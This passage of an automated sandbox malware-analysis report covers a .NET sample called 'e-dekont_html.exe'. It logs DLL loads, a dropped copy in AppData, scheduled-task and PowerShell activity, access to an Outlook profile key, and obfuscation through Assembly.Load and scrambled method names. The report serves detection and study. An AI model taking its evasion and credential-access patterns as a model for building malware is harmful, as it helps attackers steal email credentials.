                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\e-dekont_html.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: e-dekont_html.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: e-dekont_html.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: e-dekont_html.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: QrSB.pdb source: e-dekont_html.exe, HvgRSvNGGXnNtV.exe.0.dr
                Source: Binary string: QrSB.pdbSHA256 source: e-dekont_html.exe, HvgRSvNGGXnNtV.exe.0.dr

                Data Obfuscation

                barindex
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, iREnGfcZgH5xV715w4.cs.Net Code: NjXpK65iEh System.Reflection.Assembly.Load(byte[])
                Source: 0.2.e-dekont_html.exe.37b9f78.2.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, iREnGfcZgH5xV715w4.cs.Net Code: NjXpK65iEh System.Reflection.Assembly.Load(byte[])
                Source: e-dekont_html.exeStatic PE information: 0xC3848D12 [Mon Dec 11 18:53:06 2073 UTC]
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08667298 push cs; ret 0_2_08667299
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E59241 push es; ret 10_2_06E59244
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_02744EDC pushfd ; retf 11_2_02744EDD
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_07C42933 push esp; ret 11_2_07C42939
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A7298 push cs; ret 11_2_080A7299
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080AC7C2 pushad ; ret 11_2_080AC7C9
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EF9C30 push esp; retf 00F1h16_2_00EF9D55
                Source: e-dekont_html.exeStatic PE information: section name: .text entropy: 7.682825162522038
                Source: HvgRSvNGGXnNtV.exe.0.drStatic PE information: section name: .text entropy: 7.682825162522038
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, AdUcGSJONaPqjv5tqq.csHigh entropy of concatenated method names: 'ihmTaSoEh8', 'eKsTNtspEH', 'XndTb1VVjh', 'gI6TlTvqNd', 'ccXTcsDDgw', 'S1BbY9UhHS', 'ac2b5cujTN', 'JdRbevIOLb', 'AdEbiQf53W', 'BCZbtHmX82'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, HW7pVNyyma3BBJpQrO.csHigh entropy of concatenated method names: 'OJWj6dussY', 'FE8jAkehWC', 's82jJlC7U6', 'cSxjWyeyaB', 'Xbkjhqoiup', 'mcejnnGkaU', 'HB9j1vKtX2', 'af1jFkHPLE', 'qWmj9IGiEc', 'ahxju6YCKj'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, upwqkx2lypDjhHuRA1.csHigh entropy of concatenated method names: 'QUuKcCoQA', 'rN54PSZ28', 'KE6XBlmF2', 'roHsQtvt1', 'Q5JARDlwW', 'VDZPi5D50', 'sduwNlL3L3C7T00PXd', 'IPjb5ejumbevXs2mpy', 'iJvqymgSZljpivrjph', 'rK279cFXN'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, CSBqd76FVHPD4GisL5.csHigh entropy of concatenated method names: 'KNcNGW1kBT', 'g5lNdxYp3Q', 'klVNETWPZb', 'mbJNRd18DL', 'yCTNYrJetZ', 'yu0N5qnfaD', 'VsyNeByBbP', 'QMaNiHmLLE', 'zrwNtdT83w', 'ad0NDIdCZu'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, i1Npms1dG9b4SLocC5.csHigh entropy of concatenated method names: 'i6YlVht249', 'n5GlLVG7KE', 'sV2lT8ssLa', 'aXOTD1r4bD', 'UNjTz62Eth', 'EPvlOgLKpA', 'LxMlIXoxFE', 'Wb5l24cs9f', 'OYylxP4JWO', 'iQFlpskF5Q'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, Wc6Q8lIphJN7WUyck5h.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mkOBMl4nEV', 'vQXB3usTXb', 'Xn9BQvLp65', 'k5tBBoDV8t', 'xDPBmXoKEJ', 'RB2BCyFTw1', 'gAWBrlZbxr'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, G2fvhYIIOeL7tHWoSLl.csHigh entropy of concatenated method names: 'dwx3Di3DHe', 'wlT3zLU6B9', 'TXmQOkKeKu', 'JbHQIXOKLg', 'bBbQ2u3SNs', 'a1KQxiPeqJ', 'PJwQpnY7sN', 'c6yQaPTr0I', 'RyEQV2yOEB', 'nrFQNQwkrN'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, yZy5NwSKgDIZAACgE3.csHigh entropy of concatenated method names: 'xWslUEmU3O', 'fCAlkosj1K', 'puLlKijBk6', 'gEMl4oFqmU', 'EsGlZGAtpd', 'L0UlXvioda', 't6ElshBKES', 'DFBl6VCP9h', 'fprlA69xgB', 'VA0lPAseV3'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, pRCkeAz5OtWm9u5i4q.csHigh entropy of concatenated method names: 'xAA3X5GH6y', 'vsW36Gq3Fm', 'Hld3AYEyro', 'd653JxMOcF', 'foh3WSHaWn', 'pLR3hn44Xo', 'Xtx3nkWxcx', 'uUq3rkpgWM', 'mWV3UZXg4K', 'Eup3klcAWN'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, YyirUV5BHEltBactSH.csHigh entropy of concatenated method names: 'gCBwiUICDj', 'wYKwD9BKL8', 'c8D7OMlKkl', 'xkW7IE97NA', 'TTDwupBgQN', 'le7w0lE7SF', 'c3UwynFMT2', 'OEiwGesa9B', 'WjXwd8wtxx', 'l7YwEP0XN3'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, MedAUjputEsyGF6Pt2.csHigh entropy of concatenated method names: 'q6XIlSBqd7', 'MVHIcPD4Gi', 'U7hIgn2WAh', 'KHAIHba9gg', 'sSHIoiB4dU', 'kGSI8ONaPq', 'kFO32ghrgCraat08u9', 'OUFu9fSYJLrg7ISGen', 'I7xII9ZbTn', 'dIlIxpMPBp'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, Ujlk6mRFBEMALBcm88.csHigh entropy of concatenated method names: 'C8owgd2QKr', 'vjAwH2uxEY', 'ToString', 'k9wwVXVLwt', 'CwCwNFjD8t', 'DHdwLIc3i5', 'JLmwbi5SYi', 'KvDwTcl0tS', 'UE1wliGhqb', 't3TwcmQdP3'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, e9ggWKPr3PnVM3SHiB.csHigh entropy of concatenated method names: 'b96bZrqFyP', 'DJObsI7arW', 'UGXLvnvwLt', 'dTGLhYdnbX', 'KamLnuh7eb', 'tY9Lf6TOyt', 'VI1L1NOJZZ', 'EWJLF3f3U8', 'a4ZLSOvrMU', 'EgwL97aJrv'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, n1sl0teDvd0Pxu4cMf.csHigh entropy of concatenated method names: 'ONfMoGy7U7', 'eAwMw6yHOS', 'H4AMMl9euG', 'mcjMQj3TZS', 'RuiMm62VR8', 'F4EMrY7Khg', 'Dispose', 'yLL7VNfD4L', 'V8n7NVdUUH', 'Ix57LG9RDN'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, nbb8QnNbmnkODG7y8r.csHigh entropy of concatenated method names: 'Dispose', 'R0PItxu4cM', 'tfl2WQQMiT', 'Rw2V43bvFc', 'JwXIDhNVJu', 'DK6IzYV3s3', 'ProcessDialogKey', 'KFQ2OjVyso', 'bAQ2Iu0dvv', 'mLr22Sn6yt'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, tjVysot2AQu0dvvgLr.csHigh entropy of concatenated method names: 'PZCMJH3mCp', 'yVkMW9lYgy', 'i1PMviYlRY', 'n8AMh0WLfW', 'AcBMnLMK4c', 'IeUMfXrdEF', 'T7aM1AVO88', 'SuZMFWsvcw', 'dySMSwlTQg', 'C55M99a6XH'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, OCmNtUG5tcQNK8ZiJ1.csHigh entropy of concatenated method names: 'EUFo9FiQZb', 'vATo0QSAXG', 'hv5oGC75bl', 'Pnood40qhE', 'OaXoWUVYwf', 'xckovfUA41', 'fI2ohgJC9o', 'AxlonaMGmE', 'ocZofEudee', 'ORco1B0Nv3'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, FoopVYA7hn2WAhfHAb.csHigh entropy of concatenated method names: 'hA5L4AoLoV', 'AgLLX2Yltt', 'UcEL6gynYa', 'OkHLAiiSkg', 'eHNLoi2yEw', 'HPCL8nPk0q', 'fQ0Lwum5Fh', 'NR4L7v1SZQ', 'SgZLMLXkLk', 'IsEL3n0v6B'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, Mn6yt0DkxrQKJDFWUY.csHigh entropy of concatenated method names: 'Yf93Lygxmv', 'sU73bsVAn3', 'WkP3TbCjPe', 'JUj3lvDfns', 'CaT3MQcYfm', 'nkZ3c63hIC', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, iREnGfcZgH5xV715w4.csHigh entropy of concatenated method names: 'iBQxaqjlfC', 'Sl5xV02clK', 'nRqxNQ7HqI', 'IhExLlPEY7', 'hJixbG7I7K', 'clCxT0311H', 'SRKxlgDjlQ', 'iOKxckB1Yl', 'fiUxqBXFuy', 'FXPxgYQUeI'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, AdUcGSJONaPqjv5tqq.csHigh entropy of concatenated method names: 'ihmTaSoEh8', 'eKsTNtspEH', 'XndTb1VVjh', 'gI6TlTvqNd', 'ccXTcsDDgw', 'S1BbY9UhHS', 'ac2b5cujTN', 'JdRbevIOLb', 'AdEbiQf53W', 'BCZbtHmX82'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, HW7pVNyyma3BBJpQrO.csHigh entropy of concatenated method names: 'OJWj6dussY', 'FE8jAkehWC', 's82jJlC7U6', 'cSxjWyeyaB', 'Xbkjhqoiup', 'mcejnnGkaU', 'HB9j1vKtX2', 'af1jFkHPLE', 'qWmj9IGiEc', 'ahxju6YCKj'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, upwqkx2lypDjhHuRA1.csHigh entropy of concatenated method names: 'QUuKcCoQA', 'rN54PSZ28', 'KE6XBlmF2', 'roHsQtvt1', 'Q5JARDlwW', 'VDZPi5D50', 'sduwNlL3L3C7T00PXd', 'IPjb5ejumbevXs2mpy', 'iJvqymgSZljpivrjph', 'rK279cFXN'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, CSBqd76FVHPD4GisL5.csHigh entropy of concatenated method names: 'KNcNGW1kBT', 'g5lNdxYp3Q', 'klVNETWPZb', 'mbJNRd18DL', 'yCTNYrJetZ', 'yu0N5qnfaD', 'VsyNeByBbP', 'QMaNiHmLLE', 'zrwNtdT83w', 'ad0NDIdCZu'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, i1Npms1dG9b4SLocC5.csHigh entropy of concatenated method names: 'i6YlVht249', 'n5GlLVG7KE', 'sV2lT8ssLa', 'aXOTD1r4bD', 'UNjTz62Eth', 'EPvlOgLKpA', 'LxMlIXoxFE', 'Wb5l24cs9f', 'OYylxP4JWO', 'iQFlpskF5Q'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, Wc6Q8lIphJN7WUyck5h.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mkOBMl4nEV', 'vQXB3usTXb', 'Xn9BQvLp65', 'k5tBBoDV8t', 'xDPBmXoKEJ', 'RB2BCyFTw1', 'gAWBrlZbxr'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, G2fvhYIIOeL7tHWoSLl.csHigh entropy of concatenated method names: 'dwx3Di3DHe', 'wlT3zLU6B9', 'TXmQOkKeKu', 'JbHQIXOKLg', 'bBbQ2u3SNs', 'a1KQxiPeqJ', 'PJwQpnY7sN', 'c6yQaPTr0I', 'RyEQV2yOEB', 'nrFQNQwkrN'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, yZy5NwSKgDIZAACgE3.csHigh entropy of concatenated method names: 'xWslUEmU3O', 'fCAlkosj1K', 'puLlKijBk6', 'gEMl4oFqmU', 'EsGlZGAtpd', 'L0UlXvioda', 't6ElshBKES', 'DFBl6VCP9h', 'fprlA69xgB', 'VA0lPAseV3'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, pRCkeAz5OtWm9u5i4q.csHigh entropy of concatenated method names: 'xAA3X5GH6y', 'vsW36Gq3Fm', 'Hld3AYEyro', 'd653JxMOcF', 'foh3WSHaWn', 'pLR3hn44Xo', 'Xtx3nkWxcx', 'uUq3rkpgWM', 'mWV3UZXg4K', 'Eup3klcAWN'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, YyirUV5BHEltBactSH.csHigh entropy of concatenated method names: 'gCBwiUICDj', 'wYKwD9BKL8', 'c8D7OMlKkl', 'xkW7IE97NA', 'TTDwupBgQN', 'le7w0lE7SF', 'c3UwynFMT2', 'OEiwGesa9B', 'WjXwd8wtxx', 'l7YwEP0XN3'
